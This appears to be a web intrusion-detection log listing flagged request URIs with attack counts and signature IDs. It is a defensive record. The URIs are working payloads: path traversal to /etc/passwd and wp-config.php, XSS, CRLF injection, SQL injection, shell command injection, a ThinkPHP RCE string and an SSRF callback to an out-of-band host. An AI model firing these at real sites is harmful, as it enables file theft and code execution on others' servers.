Packet [310]	Uri [/web/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini]	Nattacks [1]	Signatures	[300001517]
Packet [311]	Uri [/web/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('25SnmKjtf5X54AnPR9KjAnYOCaj')%3E]	Nattacks [4]	Signatures	[300000052]	[300000053]	[300000508]	[300000528]
Packet [315]	Uri [/web/download?type=files&filename=../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [316]	Uri [/web/%0ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [1]	Signatures	[300001359]
Packet [321]	Uri [/web/cgi-bin/operator/fileread?READ.filePath=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [324]	Uri [/web/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [325]	Uri [/web/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini]	Nattacks [1]	Signatures	[300001517]
Packet [327]	Uri [/web/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [328]	Uri [/web/sys/ui/extend/varkind/custom.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [331]	Uri [/web/index.php?s=/home/page/uploadImg]	Nattacks [1]	Signatures	[300002734]
Packet [333]	Uri [/web/download.php?file=../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [334]	Uri [/web/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [340]	Uri [/web/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [343]	Uri [/web/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E]	Nattacks [3]	Signatures	[300000508]	[300000515]	[300000537]
Packet [344]	Uri [/web/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [346]	Uri [/web/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/]	Nattacks [3]	Signatures	[300001359]	[300001516]	[300002734]
Packet [348]	Uri [/web/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [352]	Uri [/web/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('25SnmLk9MNa72UAISlihXxDaZJE')%3elujb7/admin/imgProcess.cfm]	Nattacks [6]	Signatures	[300000052]	[300000502]	[300000508]	[300000516]	[300000528]	[300001516]
Packet [354]	Uri [/web/?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E]	Nattacks [3]	Signatures	[300000052]	[300000528]	[300002793]
Packet [355]	Uri [/web/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [356]	Uri [/web/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E]	Nattacks [7]	Signatures	[300000051]	[300000053]	[300000069]	[300000508]	[300000550]	[300001879]	[300002756]
Packet [357]	Uri [/web/sys/ui/extend/varkind/custom.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [359]	Uri [/web/?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E]	Nattacks [3]	Signatures	[300000052]	[300000528]	[300002793]
Packet [360]	Uri [/web/download.php?file=../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [362]	Uri [/web/index.php?s=/home/page/uploadImg]	Nattacks [1]	Signatures	[300002734]
Packet [367]	Uri [/web/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [369]	Uri [/web/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [373]	Uri [/web/file=C:%5CWindows%5Cwin.ini]	Nattacks [1]	Signatures	[300001517]
Packet [375]	Uri [/web/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [377]	Uri [/web/wp-content/themes/prostore/go.php?https://example.com/]	Nattacks [1]	Signatures	[300001136]
Packet [378]	Uri [/web/sys/ui/extend/varkind/custom.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [384]	Uri [/web/index.php?page=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [385]	Uri [/web/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E]	Nattacks [3]	Signatures	[300000508]	[300000515]	[300000537]
Packet [386]	Uri [/web/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [390]	Uri [/web/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E]	Nattacks [4]	Signatures	[300000502]	[300000508]	[300000516]	[300000528]
Packet [391]	Uri [/web/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/]	Nattacks [3]	Signatures	[300001359]	[300001516]	[300002734]
Packet [392]	Uri [/web/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E]	Nattacks [3]	Signatures	[300000508]	[300000515]	[300000537]
Packet [393]	Uri [/web/.wp-config.php.swp]	Nattacks [2]	Signatures	[300001512]	[300001518]
Packet [394]	Uri [/web/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [395]	Uri [/web/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1]	Nattacks [3]	Signatures	[300001024]	[300001025]	[300002838]
Packet [398]	Uri [/web/msa/../../../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [399]	Uri [/web/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd]	Nattacks [2]	Signatures	[300001516]	[300002734]
Packet [401]	Uri [/web/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('25SnmLk9MNa72UAISlihXxDaZJE')%3elujb7/admin/imgProcess.cfm]	Nattacks [6]	Signatures	[300000052]	[300000502]	[300000508]	[300000516]	[300000528]	[300001516]
Packet [407]	Uri [/web/js/../../../../../../../../etc/passwd%00.jpg]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001359]	[300001559]
Packet [408]	Uri [/web/lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('25SnmLk9MNa72UAISlihXxDaZJE')%3elujb7/admin/imgProcess.cfm]	Nattacks [6]	Signatures	[300000052]	[300000502]	[300000508]	[300000516]	[300000528]	[300001516]
Packet [410]	Uri [/web/page/exportImport/uploadOperation.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [411]	Uri [/web/wp-config.inc]	Nattacks [2]	Signatures	[300001517]	[300002829]
Packet [412]	Uri [/web//netcore_get.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [414]	Uri [/web/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [415]	Uri [/web///////../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [416]	Uri [/web/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini]	Nattacks [1]	Signatures	[300001517]
Packet [417]	Uri [/web/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [418]	Uri [/web/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001053]	[300001145]
Packet [421]	Uri [/web/file=C:%5CWindows%5Cwin.ini]	Nattacks [1]	Signatures	[300001517]
Packet [423]	Uri [/web/wp-content/themes/prostore/go.php?https://example.com/]	Nattacks [1]	Signatures	[300001136]
Packet [427]	Uri [/web/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd]	Nattacks [2]	Signatures	[300001516]	[300002734]
Packet [428]	Uri [/web/systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini]	Nattacks [2]	Signatures	[300000067]	[300001145]
Packet [431]	Uri [/web/msa/../../../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [432]	Uri [/web/%0D%0ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [1]	Signatures	[300001359]
Packet [433]	Uri [/web/e/ViewImg/index.html?url=javascript:alert(document.domain)]	Nattacks [3]	Signatures	[300000508]	[300000550]	[300001882]
Packet [435]	Uri [/web/js/../../../../../../../../etc/passwd%00.jpg]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001359]	[300001559]
Packet [438]	Uri [/web/sys/ui/extend/varkind/custom.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [439]	Uri [/web/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1]	Nattacks [3]	Signatures	[300001024]	[300001025]	[300002838]
Packet [441]	Uri [/web/%00/example.com/]	Nattacks [1]	Signatures	[300001359]
Packet [442]	Uri [/web/page/exportImport/uploadOperation.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [444]	Uri [/web///////../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [446]	Uri [/web/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001053]	[300001145]
Packet [447]	Uri [/web/seeyon/thirdpartyController.do.css/..;/ajax.do]	Nattacks [2]	Signatures	[300000051]	[300002755]
Packet [449]	Uri [/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [450]	Uri [/web/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [451]	Uri [/web/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [452]	Uri [/web/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E]	Nattacks [4]	Signatures	[300000502]	[300000508]	[300000516]	[300000528]
Packet [454]	Uri [/web/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [456]	Uri [/web/wp-config.inc]	Nattacks [2]	Signatures	[300001517]	[300002829]
Packet [457]	Uri [/web/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [458]	Uri [/web/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [459]	Uri [/web/page/exportImport/fileTransfer/poc.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [461]	Uri [/web/static///////../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [462]	Uri [/web/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E]	Nattacks [4]	Signatures	[300000502]	[300000508]	[300000516]	[300000528]
Packet [464]	Uri [/web/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(xss)%3E]	Nattacks [3]	Signatures	[300000052]	[300000508]	[300000528]
Packet [465]	Uri [/web/manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../poc.txt&id=1]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [468]	Uri [/web/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [469]	Uri [/web/wp-config.old]	Nattacks [1]	Signatures	[300001518]
Packet [470]	Uri [/web/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00]	Nattacks [3]	Signatures	[300001359]	[300001559]	[300002734]
Packet [471]	Uri [/web/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [472]	Uri [/web///../app.js]	Nattacks [1]	Signatures	[300000067]
Packet [473]	Uri [/web/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [474]	Uri [/web/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("25SnmL4gMrJaXMbXMymwGI3wvBU")>]	Nattacks [2]	Signatures	[300000508]	[300000528]
Packet [476]	Uri [/web/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [477]	Uri [/web/plus/carbuyaction.php?dopost=return&code=../../]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [480]	Uri [/web/%0D%0ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [1]	Signatures	[300001359]
Packet [481]	Uri [/web/e/ViewImg/index.html?url=javascript:alert(document.domain)]	Nattacks [3]	Signatures	[300000508]	[300000550]	[300001882]
Packet [484]	Uri [/web/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E]	Nattacks [3]	Signatures	[300000508]	[300000515]	[300000537]
Packet [486]	Uri [/web/?{alert(1)}]	Nattacks [1]	Signatures	[300000508]
Packet [488]	Uri [/web/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [489]	Uri [/web/%00/example.com/]	Nattacks [1]	Signatures	[300001359]
Packet [493]	Uri [/web/seeyon/thirdpartyController.do.css/..;/ajax.do]	Nattacks [2]	Signatures	[300000051]	[300002755]
Packet [500]	Uri [/web/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [501]	Uri [/web/page/exportImport/fileTransfer/poc.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [502]	Uri [/web/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [505]	Uri [/web/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [506]	Uri [/web/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [508]	Uri [/web/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6]	Nattacks [1]	Signatures	[300000550]
Packet [509]	Uri [/web/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E]	Nattacks [4]	Signatures	[300000502]	[300000508]	[300000516]	[300000528]
Packet [510]	Uri [/web/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(xss)%3E]	Nattacks [3]	Signatures	[300000052]	[300000508]	[300000528]
Packet [514]	Uri [/web/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00]	Nattacks [3]	Signatures	[300001359]	[300001559]	[300002734]
Packet [515]	Uri [/web/wp-config.old]	Nattacks [1]	Signatures	[300001518]
Packet [516]	Uri [/web/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [517]	Uri [/web///../app.js]	Nattacks [1]	Signatures	[300000067]
Packet [519]	Uri [/web/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [521]	Uri [/web/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [522]	Uri [/web/plus/carbuyaction.php?dopost=return&code=../../]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [523]	Uri [/web/_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E]	Nattacks [5]	Signatures	[300000068]	[300000505]	[300000508]	[300000528]	[300000550]
Packet [524]	Uri [/web/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [526]	Uri [/web/wp-content/themes/Attitude/go.php?https://example.com/]	Nattacks [1]	Signatures	[300001136]
Packet [527]	Uri [/web/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [528]	Uri [/web/../../../../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [534]	Uri [/web/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [535]	Uri [/web/wp-content/uploads/mc4wp-debug.log]	Nattacks [1]	Signatures	[300001518]
Packet [536]	Uri [/web/?{alert(1)}]	Nattacks [1]	Signatures	[300000508]
Packet [538]	Uri [/web/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E]	Nattacks [3]	Signatures	[300000508]	[300000515]	[300000537]
Packet [541]	Uri [/web/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [542]	Uri [/web/%0DSet-Cookie:crlfinjection=crlfinjection]	Nattacks [1]	Signatures	[300001359]
Packet [545]	Uri [/web/index.php/Home/uploadify/fileList?type=.+&path=../../../]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [547]	Uri [/web/index.php?id=50&file=../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [553]	Uri [/web/wp-config.php.txt]	Nattacks [1]	Signatures	[300001512]
Packet [555]	Uri [/web/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [556]	Uri [/web/thruk/cgi-bin/login.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [557]	Uri [/web/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6]	Nattacks [1]	Signatures	[300000550]
Packet [563]	Uri [/web/service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://c8acjap9m8v98g1htghgcekcuoeyyyynq.oast.online%23.salesforce.com/]	Nattacks [2]	Signatures	[300000069]	[300001516]
Packet [567]	Uri [/web/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter=]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [572]	Uri [/web/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [575]	Uri [/web/_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E]	Nattacks [5]	Signatures	[300000068]	[300000505]	[300000508]	[300000528]	[300000550]
Packet [582]	Uri [/web/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [585]	Uri [/web/%5chttp://192.168.1.104example.com/%2f%2e%2e]	Nattacks [1]	Signatures	[300001879]
Packet [586]	Uri [/web/%0DSet-Cookie:crlfinjection=crlfinjection]	Nattacks [1]	Signatures	[300001359]
Packet [588]	Uri [/web/%0ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [1]	Signatures	[300001359]
Packet [591]	Uri [/web/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection]	Nattacks [2]	Signatures	[300000053]	[300001359]
Packet [594]	Uri [/web/index.php/Home/uploadify/fileList?type=.+&path=../../../]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [596]	Uri [/web/index.php?id=50&file=../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [601]	Uri [/web/downloadfile.php?file=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [602]	Uri [/web/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001053]	[300001145]
Packet [604]	Uri [/web/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [605]	Uri [/web/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E]	Nattacks [5]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]	[300001516]
Packet [606]	Uri [/web/interlib/report/ShowImage?localPath=etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [607]	Uri [/web/wp-config.php.txt]	Nattacks [1]	Signatures	[300001512]
Packet [608]	Uri [/web/thruk/cgi-bin/login.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [609]	Uri [/web/wp-config.php.bak]	Nattacks [2]	Signatures	[300001512]	[300001927]
Packet [612]	Uri [/web/wp-content/themes/Grimag/go.php?https://example.com]	Nattacks [1]	Signatures	[300001136]
Packet [613]	Uri [/web/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [617]	Uri [/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)]	Nattacks [1]	Signatures	[300001026]
Packet [618]	Uri [/web/plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [619]	Uri [/web/service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://c8acjap9m8v98g1htghgcekcuoeyyyynq.oast.online%23.salesforce.com/]	Nattacks [2]	Signatures	[300000069]	[300001516]
Packet [624]	Uri [/web/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter=]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [626]	Uri [/web/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [627]	Uri [/web/%20../web-inf/web.xml]	Nattacks [1]	Signatures	[300000067]
Packet [631]	Uri [/web/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [633]	Uri [/web/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [635]	Uri [/web/admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300000077]	[300001559]
Packet [638]	Uri [/web/%5chttp://192.168.1.104example.com/%2f%2e%2e]	Nattacks [1]	Signatures	[300001879]
Packet [641]	Uri [/web/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [646]	Uri [/web/../example.com]	Nattacks [1]	Signatures	[300000067]
Packet [651]	Uri [/web/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection]	Nattacks [2]	Signatures	[300000053]	[300001359]
Packet [654]	Uri [/web/%0ASet-Cookie%3Acrlfinjection/..]	Nattacks [1]	Signatures	[300001359]
Packet [656]	Uri [/web/downloadfile.php?file=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [657]	Uri [/web/wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E]	Nattacks [5]	Signatures	[300000502]	[300000508]	[300000516]	[300000528]	[300000550]
Packet [659]	Uri [/web/(download)/etc/passwd]	Nattacks [1]	Signatures	[300001559]
